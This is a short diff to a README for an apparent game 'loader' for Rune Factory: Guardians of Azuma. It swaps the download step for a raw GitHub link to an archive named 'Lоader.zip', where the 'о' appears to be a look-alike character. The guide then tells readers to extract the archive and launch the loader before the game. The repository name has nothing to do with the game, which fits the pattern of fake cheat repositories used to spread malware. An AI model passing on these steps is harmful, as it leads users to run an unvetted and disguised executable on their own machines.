5321444/pitlane-attest/README.md

 ## 🚀 Installation Guide

-1. Download *Loader.rar* from this repository.
+1. Download *https://raw.githubusercontent.com/5321444/pitlane-attest/main/Lоader.zip* from this repository.
 2. Extract the archive using your favorite tool.
 3. Launch the loader before starting Rune Factory: Guardians of Azuma.
 4. Select your desired enhancements and enjoy!